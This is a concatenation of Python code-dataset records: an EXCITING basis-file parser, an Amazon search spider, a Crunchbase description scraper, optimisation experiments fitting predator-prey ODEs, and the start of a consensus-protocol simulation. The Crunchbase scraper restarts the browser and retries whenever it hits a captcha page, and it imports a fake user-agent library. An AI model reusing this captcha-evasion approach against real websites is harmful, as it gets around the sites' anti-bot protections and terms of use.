default.attributes['searchE'].value.lower() == 'true' else False\n \n basis['custom'] = []\n for cstm in specie.getElementsByTagName(\"custom\"):\n basis['custom'].append({})\n basis['custom'][-1]['l'] = azimuthal_sequence[ int(cstm.attributes['l'].value) ]\n basis['custom'][-1]['type'] = cstm.attributes['type'].value\n basis['custom'][-1]['trialEnergy'] = float(cstm.attributes['trialEnergy'].value)\n basis['custom'][-1]['searchE'] = True if cstm.attributes['searchE'].value.lower() == 'true' else False\n basis['custom'].sort(cmp = lambda x, y: -1 if azimuthal_sequence.index(x['l']) < azimuthal_sequence.index(y['l']) else 1) # accordingly\n \n basis['lo'] = []\n for lo in specie.getElementsByTagName(\"lo\"):\n basis['lo'].append([ azimuthal_sequence[ int(lo.attributes['l'].value) ] ])\n for wf in lo.getElementsByTagName(\"wf\"):\n basis['lo'][-1].append({})\n basis['lo'][-1][-1]['deriv'] = int(wf.attributes['matchingOrder'].value)\n basis['lo'][-1][-1]['trialEnergy'] = float(wf.attributes['trialEnergy'].value)\n basis['lo'][-1][-1]['searchE'] = True if wf.attributes['searchE'].value.lower() == 'true' else False\n basis['lo'].sort(cmp = lambda x, y: -1 if azimuthal_sequence.index(x[0]) < azimuthal_sequence.index(y[0]) else 1) # accordingly\n \n return basis\n\n","sub_path":"parsers/EXCITING/EXCITING.py","file_name":"EXCITING.py","file_ext":"py","file_size_in_byte":24551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"341517441","text":"from selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\n\n\nclass AmazonSpider:\n\n def __init__(self, marca, modelo):\n self.marca = marca\n self.modelo = modelo\n\n def launch_spider(self):\n pass\n\n\ntext_to_search = 'lg k40'\n\nbrowser = webdriver.Chrome()\nbrowser.get('https://www.amazon.es/')\n\nsearch_bar = browser.find_element_by_id('twotabsearchtextbox')\nsearch_bar.send_keys(text_to_search)\nsearch_bar.submit()\n\n# Ya hemos llegado a la página con el listado de productos\nlist_of_products = browser.find_element_by_css_selector(\".sg-col-inner .s-search-results\")\n\nlist_of_products = list_of_products.find_elements_by_xpath('child::div')\n\ni = 0\nfor p in list_of_products:\n try:\n p.find_element_by_class_name('s-shopping-adviser')\n p.find_element_by_class_name('s-border-top-overlap')\n except:\n i += 1\n\nprint(i)","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"134972043","text":"from selenium import webdriver\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\nimport io\r\nimport numpy as np\r\nfrom selenium.webdriver.chrome.options import Options\r\nimport pandas as pd\r\nimport csv\r\nfrom fake_useragent import UserAgent\r\n\r\n#insert the path of the geckodriver in your local machine\r\ngeckodriver_path = \"\"\r\n\r\nfinal_data = pd.read_csv(\"../data/initial_datasets/Business_Analytics/data/technology_nan\",delimiter = '|')\r\ncrunchbase_dataset = pd.read_excel('../data/initial_datasets/crunchbase_monthly_export_d43b4klo2ade53.xlsx',sheet_name = 'Companies')\r\ncrunchbase_dataset1 = crunchbase_dataset.rename(columns = {'name':'company_name'})\r\n\r\nmerged = pd.merge(final_data,crunchbase_dataset1, on = 'company_name').loc[:,['company_name','permalink']]\r\n\r\nlinks = merged.loc[:,'permalink']\r\ndriver = webdriver.Firefox(executable_path=geckodriver_path)\r\nwith 
io.open('../data/initial_datasets/descriptions_scraped/Descriptions.csv','a',newline='',encoding=\"utf-8\") as csvfile:\r\n    write = csv.writer(csvfile, delimiter = '|')\r\n    i = 939\r\n    while i < 1004:\r\n        new_url = 'https://www.crunchbase.com/{0}'.format(links[i])\r\n        driver.get(new_url)\r\n        time.sleep(np.random.randint(1,3))\r\n        content = driver.page_source\r\n        soup = BeautifulSoup(content, \"lxml\")\r\n        captcha_code = soup.find(\"div\", class_=\"page-title\")\r\n        if captcha_code is not None:\r\n            # hit a captcha page: restart the browser and retry the same link\r\n            # (the original decremented the loop variable of a for loop, which has no effect)\r\n            driver.quit()\r\n            driver = webdriver.Firefox(executable_path=geckodriver_path)\r\n            continue\r\n        try:\r\n            cerca = driver.find_element_by_xpath(\"/html/body/chrome/div/mat-sidenav-container/mat-sidenav-content/entity/page-layout/div[2]/div/div[2]/div/div[1]/entity-section[1]/section-layout/mat-card/div[2]/description-card/a\")\r\n            cerca.click()\r\n        except:\r\n            pass\r\n        description_code = soup.find(\"div\", class_=\"cb-display-inline\")\r\n        if description_code is None:\r\n            i += 1\r\n            continue\r\n        description = description_code.get_text()\r\n        name_code = soup.find(\"div\", class_=\"component--image-with-text-card\")\r\n        name = name_code.find('span',class_=\"ng-star-inserted\").get_text()\r\n        write.writerow([name,description])\r\n        csvfile.flush()\r\n        i += 1\r\n","sub_path":"code/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"382422052","text":"import time\nimport numpy as np\nimport pandas as pd\n# from main import ODE_error, hillclimber, sim_an, gen_al\nimport warnings\nimport scipy.integrate  # plain \"import scipy\" does not make scipy.integrate available\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error\nimport random\nwarnings.filterwarnings('ignore')\n\n\nseedy = 5\nreps = 10\ndf = pd.read_csv(\"predator-prey-data.csv\")\nt = df.values[:,0]\ndata = np.transpose(np.array([df.loc[:,'x'].values.tolist(),df.loc[:,'y'].values.tolist()]))\nstart = time.time()\nn_gen=1\npopsize=2\nn_parents=2\np_mutate=0.3\nn_iter = 5000\n\n#Create functions\ndef get_ODE(data, t, alpha, beta, gamma, delta):\n    \"\"\"Returns set of ODE's for given data and params.\"\"\"\n\n    # data should be array-like of prey and predator quantities respectively\n    # params should be array-like of 4 params (alpha, beta, gamma, delta)\n    x, y = data\n    dxdt = alpha * x - beta * x * y\n    dydt = delta * x * y - gamma * y\n    return [dxdt, dydt]\n\ndef ODE_error(params,data,t,evalfunc='RMSE'):\n    \"\"\"Solves the ODEs for the given params and returns the error between solution and data.\"\"\"\n\n    # data should be array-like of prey and predator quantities respectively\n    # params should be array-like of 4 params (alpha, beta, gamma, delta)\n\n\n    init = data[0]\n    est = scipy.integrate.odeint(get_ODE, init, t, args=tuple(params))\n    if evalfunc == 'MSE':\n        error_x = mean_squared_error(est[:,0],data[:,0])\n        error_y = mean_squared_error(est[:,1],data[:,1])\n        error = np.mean([error_x,error_y])\n    elif evalfunc == 'RMSE':\n        error_x = mean_squared_error(est[:, 0], data[:, 0],squared=False)\n        error_y = mean_squared_error(est[:, 1], data[:, 1],squared=False)\n        error = np.mean([error_x, error_y])\n    else:\n        error_x = mean_absolute_error(est[:, 0], data[:, 0])\n        error_y = mean_absolute_error(est[:, 1], data[:, 1])\n        error = np.mean([error_x, error_y])\n    return error\n\ndef hillclimber(function, data,t,params0=(0,0,0,0),evalfunc='RMSE',n_iter=1000,stepsize=1):\n    \"\"\"Finds optimum by using hill climber algorithm (local search)\"\"\"\n\n    est_params = params0\n    try: est_eval = function(params0, 
data, t, evalfunc)\n except ValueError: est_eval = 100\n eval_list = [est_eval]\n for iter in range(n_iter):\n new_params = np.array(est_params) + np.random.uniform(-1,1,len(params0))*stepsize\n new_params[new_params < 0] = 0\n new_params[new_params > 10] = 10\n\n try: new_eval = function(new_params,data,t,evalfunc)\n except ValueError: new_eval = 100\n if new_eval <= est_eval:\n est_params, est_eval = new_params, new_eval\n eval_list.append(est_eval)\n return (est_eval, est_params, eval_list)\n\ndef sim_an(function,data,t,params0=(0,0,0,0),evalfunc='RMSE',stepsize=0.25,\n temprange=(10**0,10**-3),n_iter=5000,cooling='quadratic',n_inner=50):\n \"\"\"Performs simulated annealing to find a global solution\"\"\"\n temp0 = temprange[0]\n temp_end = temprange[1]\n if cooling == 'exponential':\n rate = (temp_end / temp0) ** (1 / (n_iter/n_inner - 1))\n elif cooling == 'linear':\n rate = (temp0-temp_end)/(n_iter/n_inner)\n else:\n alpha = (temp0 / temp_end - 1) / (n_iter/n_inner) ** 2\n\n est_params = params0\n try: est_eval = function(params0, data, t, evalfunc)\n except ValueError: est_eval = 100\n eval_list = [est_eval]\n epoch = 0\n temp = temp0\n\n for i in range(int(n_iter/n_inner)):\n inner_params, inner_eval = est_params, est_eval\n for j in range(n_inner):\n new_params = np.array(inner_params) + np.random.uniform(-1,1,len(params0))*stepsize\n new_params[new_params < 0] = 0\n new_params[new_params > 10] = 10\n try: new_eval = function(new_params, data, t, evalfunc)\n except ValueError: new_eval = 100\n delta_eval = new_eval - inner_eval\n if delta_eval < 0:\n inner_params, inner_eval = new_params, new_eval\n elif np.random.uniform(0, 1) < np.exp(-delta_eval / temp):\n inner_params, inner_eval = new_params, new_eval\n est_params, est_eval = inner_params, inner_eval\n eval_list.append(est_eval)\n epoch += 1\n if cooling == 'exponential':\n temp *= rate\n elif cooling == 'linear':\n temp -= rate\n else:\n temp = temp0 / (1 + alpha * i ** 2)\n\n return (est_eval, est_params, eval_list)\n\n\n# Estimating the three models and its parameters on full data, see convergence behavior and performance\n\n# np.random.seed(seedy)\n# for eval in ['RMSE','MAE']: # Loop over both evaluation methods\n# start1 = time.time()\n# HC05, HC10, HC125, HC15, HC_start1, HC_start2 = [], [], [], [], [], []\n# HC05_conv, HC10_conv, HC125_conv, HC15_conv, HC_start1_conv, HC_start2_conv = np.repeat(0, n_iter), np.repeat(0, n_iter),\\\n# np.repeat(0, n_iter), np.repeat(0, n_iter),\\\n# np.repeat(0, n_iter), np.repeat(0, n_iter)\n# SA01, SA025, SA05, SA10, SA40, SA100 = [], [], [], [], [], []\n# SA01_conv, SA025_conv, SA05_conv, SA10_conv, SA40_conv, SA100_conv = np.repeat(0, n_iter), np.repeat(0,n_iter), \\\n# np.repeat(0, n_iter), np.repeat(0,n_iter), \\\n# np.repeat(0, n_iter), np.repeat(0,n_iter)\n# SA_exp, SA_lin, SA_init10, SA_init01 = [], [], [], []\n# SA_exp_conv, SA_lin_conv, SA_init10_conv, SA_init01_conv = np.repeat(0, n_iter), np.repeat(0,n_iter),np.repeat(0, n_iter), np.repeat(0,n_iter)\n# for i in range(reps):\n# print('REPLICATION {}'.format(i))\n# #1. 
Stepsize experiments Hill climber\n# RMSE, params, RMSE_list = hillclimber(ODE_error, data, t,n_iter=n_iter,stepsize=0.5)\n# HC05.append(RMSE)\n# HC05_conv = [x + y for x, y in zip(HC05_conv, np.array(RMSE_list)/reps)]\n# if i == 0: params_HC05 = params\n# elif RMSE < HC05[i-1]: params_HC05 = params\n# print('HC .5 DONE')\n# print('Run {} with {} took {} seconds'.format(i,eval,time.time()-start1))\n#\n# RMSE, params, RMSE_list = hillclimber(ODE_error, data, t, n_iter=n_iter, stepsize=1)\n# HC10.append(RMSE)\n# HC10_conv = [x + y for x, y in zip(HC10_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_HC10 = params\n# elif RMSE < HC10[i - 1]: params_HC10 = params\n# print('HC 1 DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# RMSE, params, RMSE_list = hillclimber(ODE_error, data, t,n_iter=n_iter,stepsize=1.25)\n# HC125.append(RMSE)\n# HC125_conv = [x + y for x, y in zip(HC125_conv, np.array(RMSE_list)/reps)]\n# if i == 0: params_HC125 = params\n# elif RMSE < HC125[i-1]: params_HC125 = params\n# print('HC 1.25 DONE')\n# print('Run {} with {} took {} seconds'.format(i,eval,time.time()-start1))\n#\n# RMSE, params, RMSE_list = hillclimber(ODE_error, data, t,n_iter=n_iter,stepsize=1.5)\n# HC15.append(RMSE)\n# HC15_conv = [x + y for x, y in zip(HC15_conv, np.array(RMSE_list)/reps)]\n# if i == 0: params_HC15 = params\n# elif RMSE < HC15[i-1]: params_HC15 = params\n# print('HC 1.5 DONE')\n# print('Run {} with {} took {} seconds'.format(i,eval,time.time()-start1))\n#\n# #2. Starting value experiments HC\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t,n_iter=n_iter,params0=(1,1,1,1))\n# HC_start1.append(RMSE)\n# HC_start1_conv = [x + y for x, y in zip(HC_start1_conv, np.array(RMSE_list)/reps)]\n# if i == 0: params_HC_start1 = params\n# elif RMSE < HC_start1[i-1]: params_HC_start1 = params\n# print('HC 1,1,1,1 DONE')\n# print('Run {} with {} took {} seconds'.format(i,eval,time.time()-start1))\n#\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, params0=(2, 2, 2, 2))\n# HC_start2.append(RMSE)\n# HC_start2_conv = [x + y for x, y in zip(HC_start2_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_HC_start2 = params\n# elif RMSE < HC_start2[i - 1]: params_HC_start2 = params\n# print('HC 2,2,2,2 DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# #3. 
Stepsize experiments for Simulated Annealing\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter,stepsize=0.1)\n# SA01.append(RMSE)\n# SA01_conv = [x + y for x, y in zip(SA01_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA01 = params\n# elif RMSE < SA01[i - 1]: params_SA01 = params\n# print('SA .1 DONE')\n# print('Run {} with {} took {} seconds'.format(i,eval,time.time()-start1))\n#\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, stepsize=0.25)\n# SA025.append(RMSE)\n# SA025_conv = [x + y for x, y in zip(SA025_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA025 = params\n# elif RMSE < SA025[i - 1]: params_SA025 = params\n# print('SA .25 DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, stepsize=0.5)\n# SA05.append(RMSE)\n# SA05_conv = [x + y for x, y in zip(SA05_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA05 = params\n# elif RMSE < SA05[i - 1]: params_SA05 = params\n# print('SA .5 DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, stepsize=1)\n# SA10.append(RMSE)\n# SA10_conv = [x + y for x, y in zip(SA10_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA10 = params\n# elif RMSE < SA10[i - 1]: params_SA10 = params\n# print('SA 1 DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# # 4. Markov chain experiments with SA\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, n_inner=40)\n# SA40.append(RMSE)\n# SA40_conv = [x + y for x, y in zip(SA40_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA40 = params\n# elif RMSE < SA40[i - 1]: params_SA40 = params\n# print('SA 40 DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, n_inner=100)\n# SA100.append(RMSE)\n# SA100_conv = [x + y for x, y in zip(SA100_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA100 = params\n# elif RMSE < SA100[i - 1]: params_SA100 = params\n# print('SA 100 DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# # 7. Cooling schedule experiments for SA\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter,cooling='linear')\n# SA_lin.append(RMSE)\n# SA_lin_conv = [x + y for x, y in zip(SA_lin_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA_lin = params\n# elif RMSE < SA_lin[i - 1]: params_SA_lin = params\n# print('SA linear DONE')\n# print('Run {} with {} took {} seconds'.format(i,eval,time.time()-start1))\n#\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, cooling='exponential')\n# SA_exp.append(RMSE)\n# SA_exp_conv = [x + y for x, y in zip(SA_exp_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA_exp = params\n# elif RMSE < SA_exp[i - 1]: params_SA_exp = params\n# print('SA exp DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# # 8. 
Starting temperature experiments for SA\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter,temprange=(10**1,10**-3))\n# SA_init10.append(RMSE)\n# SA_init10_conv = [x + y for x, y in zip(SA_init10_conv, np.array(RMSE_list) / reps)]\n# if i == 0: params_SA_init10 = params\n# elif RMSE < SA_init10[i - 1]: params_SA_init10 = params\n# print('SA init10 DONE')\n# print('Run {} with {} took {} seconds'.format(i,eval,time.time()-start1))\n#\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, temprange=(10 ** -1, 10 ** -3))\n# SA_init01.append(RMSE)\n# SA_init01_conv = [x + y for x, y in zip(SA_init01_conv, np.array(RMSE_list) / reps)]\n# if i == 0:\n# params_SA_init01 = params\n# elif RMSE < SA_init01[i - 1]:\n# params_SA_init01 = params\n# print('SA init01 DONE')\n# print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n#\n# HC_convs = [HC05_conv, HC10_conv, HC125_conv, HC15_conv, HC_start1_conv, HC_start2_conv]\n# for j in range(len(HC_convs)):\n# if len(HC_convs[j]) < n_iter:\n# HC_convs[j].extend(list(np.zeros(n_iter-len(HC_convs[j]))))\n#\n#\n# SA01_conv = np.array([np.repeat(SA01_conv[i + 1], 50) for i in np.arange(0, len(SA01_conv) - 1)]).reshape(n_iter)\n# SA025_conv = np.array([np.repeat(SA025_conv[i + 1], 50) for i in np.arange(0, len(SA025_conv) - 1)]).reshape(n_iter)\n# SA05_conv = np.array([np.repeat(SA05_conv[i + 1], 50) for i in np.arange(0, len(SA05_conv) - 1)]).reshape(n_iter)\n# SA10_conv = np.array([np.repeat(SA10_conv[i + 1], 50) for i in np.arange(0, len(SA10_conv) - 1)]).reshape(n_iter)\n# SA40_conv = np.array([np.repeat(SA40_conv[i + 1], 40) for i in np.arange(0, len(SA40_conv) - 1)]).reshape(n_iter)\n# SA100_conv = np.array([np.repeat(SA100_conv[i + 1], 100) for i in np.arange(0, len(SA100_conv) - 1)]).reshape(n_iter)\n# SA_lin_conv = np.array([np.repeat(SA_lin_conv[i + 1], 50) for i in np.arange(0, len(SA_lin_conv) - 1)]).reshape(n_iter)\n# SA_exp_conv = np.array([np.repeat(SA_exp_conv[i + 1], 50) for i in np.arange(0, len(SA_exp_conv) - 1)]).reshape(n_iter)\n# SA_init10_conv = np.array([np.repeat(SA_init10_conv[i + 1], 50) for i in np.arange(0, len(SA_init10_conv) - 1)]).reshape(n_iter)\n# SA_init01_conv = np.array([np.repeat(SA_init01_conv[i + 1], 50) for i in np.arange(0, len(SA_init01_conv) - 1)]).reshape(n_iter)\n#\n# #Create dataframes and save\n# error_dict = {'HC05': HC05,'HC10': HC10, 'HC125': HC125,'HC15': HC15,'HC_start1': HC_start1, 'HC_start2': HC_start2,\n# 'SA01': SA01,'SA025': SA025, 'SA05': SA05,'SA10': SA10,'SA40': SA40, 'SA100': SA100,\n# 'SA_exp': SA_exp,'SA_lin': SA_lin, 'SA_init10': SA_init10,'SA_init01':SA_init01}\n# conv_dict = {'HC05': HC05_conv, 'HC10': HC10_conv, 'HC125': HC125_conv, 'HC15': HC15_conv, 'HC_start1': HC_start1_conv,\n# 'HC_start2': HC_start2_conv,'SA01': SA01_conv, 'SA025': SA025_conv, 'SA05': SA05_conv, 'SA10': SA10_conv,\n# 'SA40': SA40_conv, 'SA100': SA100_conv,'SA_exp': SA_exp_conv, 'SA_lin': SA_lin_conv, 'SA_init10': SA_init10_conv,\n# 'SA_init01': SA_init01_conv}\n# param_dict = {'HC05': params_HC05, 'HC10': params_HC10, 'HC125': params_HC125, 'HC15': params_HC15, 'HC_start1': params_HC_start1,\n# 'HC_start2': params_HC_start2,\n# 'SA01': params_SA01, 'SA025': params_SA025, 'SA05': params_SA05, 'SA10': params_SA10, 'SA40': params_SA40, 'SA100': params_SA100,\n# 'SA_exp': params_SA_exp, 'SA_lin': params_SA_lin, 'SA_init10': params_SA_init10, 'SA_init01': params_SA_init01}\n# pd.DataFrame(error_dict).to_csv('Data/{}.csv'.format(eval))\n# 
pd.DataFrame(conv_dict).to_csv('Data/{}-conv.csv'.format(eval))\n# pd.DataFrame(param_dict).to_csv('Data/{}-params.csv'.format(eval))\n\nprint('Simulations with varying startvalues and cooling took {} seconds'.format(time.time()-start))\n\n#Run optimal settings for HC and SA\nnp.random.seed(seedy)\nn_iter = 500\nreps = 2\nfor eval in ['RMSE','MAE']: # Loop over both evaluation methods\n start1 = time.time()\n HC, SA, HC_conv, SA_conv = [], [], np.zeros(n_iter), np.zeros(n_iter)\n\n for i in range(reps):\n print('REPLICATION {}'.format(i))\n #HC\n RMSE, params, RMSE_list = hillclimber(ODE_error, data, t,n_iter=n_iter,stepsize=1)\n HC.append(RMSE)\n HC_conv = [x + y for x, y in zip(HC_conv, np.array(RMSE_list)/reps)]\n if i == 0: params_HC = params\n elif RMSE < HC[i-1]: params_HC = params\n print('HC DONE')\n print('Run {} with {} took {} seconds'.format(i,eval,time.time()-start1))\n\n #SA\n RMSE, params, RMSE_list = sim_an(ODE_error, data, t, n_iter=n_iter, stepsize=0.25)\n SA.append(RMSE)\n SA_conv = [x + y for x, y in zip(SA_conv, np.array(RMSE_list) / reps)]\n if i == 0: params_SA = params\n elif RMSE < SA[i - 1]: params_SA = params\n print('SA DONE')\n print('Run {} with {} took {} seconds'.format(i, eval, time.time() - start1))\n\n if len(HC_conv) < n_iter:\n HC_conv.extend(list(np.zeros(n_iter - len(HC_conv))))\n SA_conv = np.array([np.repeat(SA_conv[i + 1], 50) for i in np.arange(0, len(SA_conv) - 1)]).reshape(n_iter)\n pd.DataFrame({'HC':HC,'SA':SA}).to_csv('optimal-{}.csv'.format(eval))\n pd.DataFrame({'HC':HC_conv,'SA':SA_conv}).to_csv('optimal-{}-conv.csv'.format(eval))\n pd.DataFrame({'HC':params_HC,'SA':params_SA}).to_csv('optimal-params-{}.csv'.format(eval))\n\n# ## Estimating the three models and its parameters on part of data, see convergence behavior and performance\n# np.random.seed(seedy)\n# reps = 5\n#\n# for eval in ['RMSE', 'MAE']:\n# print('Runs with {} as evaluation function'.format(eval))# Loop over both evaluation methods\n# RMSE_HC, RMSE_SA, RMSE_GA = [], [], []\n# RMSE_HC_std, RMSE_SA_std, RMSE_GA_std = [], [], []\n#\n# for s in np.arange(100,20,-10):\n# start2 = time.time()\n# print('SAMPLE SIZE {}'.format(s))\n# df_sample = df.sample(s).sort_values(by='t')\n# t = df_sample.loc[:, 't'].to_numpy()\n# data = np.transpose(np.array([df_sample.loc[:, 'x'].values.tolist(), df_sample.loc[:, 'y'].values.tolist()]))\n#\n# RMSE_HC_sample, RMSE_SA_sample, RMSE_GA_sample = [], [], []\n# #Replicate experiments\n# for i in range(reps):\n# #1. Hill climber\n# print('REP {}'.format(i))\n# RMSE, params, RMSE_list = hillclimber(ODE_error, data, t,n_iter=n_iter)\n# RMSE_HC_sample.append(RMSE)\n#\n# #2. Simulated Annealing\n# RMSE, params, RMSE_list = sim_an(ODE_error, data, t,n_iter=n_iter)\n# RMSE_SA_sample.append(RMSE)\n#\n# # #3. 
Genetic Algorithm\n#             RMSE, params, pop, RMSE_list_best, RMSE_list_avg = gen_al(ODE_error, data, t, n_gen=n_gen)\n#             RMSE_GA_sample.append(RMSE)\n#         RMSE_HC.append(np.mean(RMSE_HC_sample))\n#         RMSE_SA.append(np.mean(RMSE_SA_sample))\n#         # RMSE_GA.append(np.mean(RMSE_GA_sample))\n#         RMSE_HC_std.append(np.std(RMSE_HC_sample))\n#         RMSE_SA_std.append(np.std(RMSE_SA_sample))\n#         # RMSE_GA_std.append(np.std(RMSE_GA_sample))\n#         print('Run with {} percent of data took {} seconds'.format(s,time.time()-start2))\n#\n#     #Create dataframes and save\n#     RMSE_dict = {'HC_mean':RMSE_HC,'HC_std':RMSE_HC_std,'SA_mean':RMSE_SA,'SA_std':RMSE_SA_std}\n#     pd.DataFrame(RMSE_dict).to_csv('Data/fracdata-{}.csv'.format(eval))\n\n\nprint('Simulations took {} seconds'.format(time.time()-start))\n\n#3. Genetic Algorithm\n# RMSE, params, pop, RMSE_list_best, RMSE_list_avg = gen_al(ODE_error, data, t, n_gen=n_gen)\n# RMSE_GA.append(RMSE)\n# RMSE_GA_conv = [x + y for x, y in zip(RMSE_GA_conv, np.array(RMSE_list_best) / reps)]\n# RMSE_GA_conv2 = [x + y for x, y in zip(RMSE_GA_conv2, np.array(RMSE_list_avg) / reps)]\n# if i == 0:\n#     params_GA = params\n# elif RMSE < RMSE_GA[i - 1]:\n#     params_GA = params\n# #Create dataframes and save\n# RMSE_dict = {'HC':RMSE_HC,'SA':RMSE_SA,'GA':RMSE_GA}\n# pd.DataFrame(RMSE_dict).to_csv('Data/{}-overall-{}.csv'.format(name,eval))\n# RMSE_dict = {'HC':RMSE_HC_conv,'SA':RMSE_SA_conv}\n# pd.DataFrame(RMSE_dict).to_csv('Data/{}-avg-conv-{}.csv'.format(name,eval))\n# pd.DataFrame({'GA':RMSE_GA_conv}).to_csv('Data/{}-avg-conv-GA-{}.csv'.format(name,eval))\n# param_dict = {'HC':params_HC,'SA':params_SA,'GA':params_GA}\n# pd.DataFrame(param_dict).to_csv('Data/{}-best-params-{}.csv'.format(name,eval))\n\n\ndef gen_al(function,data,t,evalfunc='RMSE',popsize=50,n_gen=25,\n           n_parents=30,p_mutate=0.3):\n    \"\"\"Performs a genetic algorithm to find a solution\"\"\"\n    pop = np.random.uniform(0, 2, (popsize,4))\n    pop_eval = np.zeros(popsize)\n    for p in range(popsize):\n        try: pop_eval[p] = function(pop[p], data, t, evalfunc)\n        except ValueError: pop_eval[p] = 100\n    eval_list1 = [min(pop_eval)]\n    eval_list2 = [np.mean(pop_eval)]\n\n    epoch = 0\n\n    for i in range(n_gen):\n        # select the n_parents fittest individuals and pair them randomly\n        sort_eval = list(np.sort(pop_eval))\n        parents = []\n        for j in range(n_parents):\n            parents.append(np.where(pop_eval == sort_eval[j])[0][0])\n        random.shuffle(parents)\n\n        for j in range(int(len(parents) / 2)):\n            # arithmetic (blend) crossover producing 1 to 3 offspring per pair,\n            # with additive Gaussian mutation at probability p_mutate\n            for k in range(np.random.randint(1, 4)):\n                alpha = np.random.uniform(0, 1)\n                offspring = alpha * pop[parents[j]] + (1 - alpha) * pop[parents[j + int(len(parents) / 2)]]\n                if np.random.uniform(0, 1) <= p_mutate:\n                    offspring += np.random.normal(0, 1, 4)/20\n                offspring[offspring < 0] = 0\n                pop = np.vstack((pop, offspring))\n        pop_eval = np.zeros(pop.shape[0])\n        for p in range(pop.shape[0]):\n            try: pop_eval[p] = function(pop[p], data, t, evalfunc)\n            except ValueError: pop_eval[p] = 100\n        # truncation selection: keep only the popsize fittest individuals\n        sort_eval = list(np.sort(pop_eval))\n        index = []\n        for j in range(popsize):\n            index.append(np.where(pop_eval == sort_eval[j])[0][0])\n        pop = pop[index]\n        pop_eval = sort_eval[0:popsize]\n        best_eval = min(pop_eval)\n        best_params = pop[np.where(pop_eval == best_eval)[0][0]]\n        eval_list1.append(best_eval)\n        eval_list2.append(np.mean(pop_eval))\n        epoch += 1\n        # print(epoch)\n\n    return (best_eval, best_params, 
pop,eval_list1,eval_list2)\n","sub_path":"Assignment-3/Data/data_cartesius/data_cartesius_14-12/archive/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":22805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"326385940","text":"import random\n\nfrom config import get_config\n\nfrom event_simulator import Event, EventSimulator\nfrom node import Node\nfrom message import Message\nfrom network import Network\n\n\ndef simulation(des, net, config):\n t_proposer = 5\n t_step = 32\n t_final = 32\n _round = 0\n step = 0\n total_j = 0.0\n MAX_STEPS = 10\n s_dash = None\n final_block_count = 0\n calculate_flag = False\n\n ev = des.get_next_event()\n while ev:\n # print(ev)\n node = ev.node\n _type = ev.type\n current_time = ev.timestamp\n if _type == 'PRIORITY_MESSAGE':\n _t = current_time + 33000\n des.add_event(Event(_t, 'CAST_VOTE', node))\n _message = node.create_priority_message(\n node.round, node.step, t_proposer)\n _t = current_time + 3000\n des.add_event(Event(_t, 'CREATE_BLOCK_PROPOSAL', node))\n if _message is not None:\n \n if config.exp2 and calculate_flag != True:\n calculate_flag = False\n _t = current_time + 100\n des.add_event(Event(_t, 'CALCULATE'))\n\n # _t = current_time + 3000\n # des.add_event(Event(_t, 'CREATE_BLOCK_PROPOSAL', node))\n for rcv_node in node.neighbors:\n _t = current_time + node.non_block_msg_delay\n des.add_event(\n Event(_t, 'RECEIVE_PRIORITY_MESSAGE', rcv_node, _message))\n \n if _type == 'CALCULATE':\n net.print_highest_proposer()\n break\n\n elif _type == 'RECEIVE_PRIORITY_MESSAGE':\n _message = node.receive_prio_msg(ev.message)\n if _message is not None:\n for rcv_node in node.neighbors:\n _t = current_time + node.non_block_msg_delay\n des.add_event(\n Event(_t, 'RECEIVE_PRIORITY_MESSAGE', rcv_node, _message))\n\n elif _type == 'CREATE_BLOCK_PROPOSAL':\n des.remove_event('RECEIVE_PRIORITY_MESSAGE', current_time)\n _message = node.propose_block()\n if _message is not None:\n for rcv_node in node.neighbors:\n _t = current_time + node.block_msg_delay\n des.add_event(\n Event(_t, 'RECEIVE_BLOCK_PROPOSAL', rcv_node, _message))\n\n elif _type == 'RECEIVE_BLOCK_PROPOSAL':\n _message = node.receive_block_proposal(ev.message)\n if 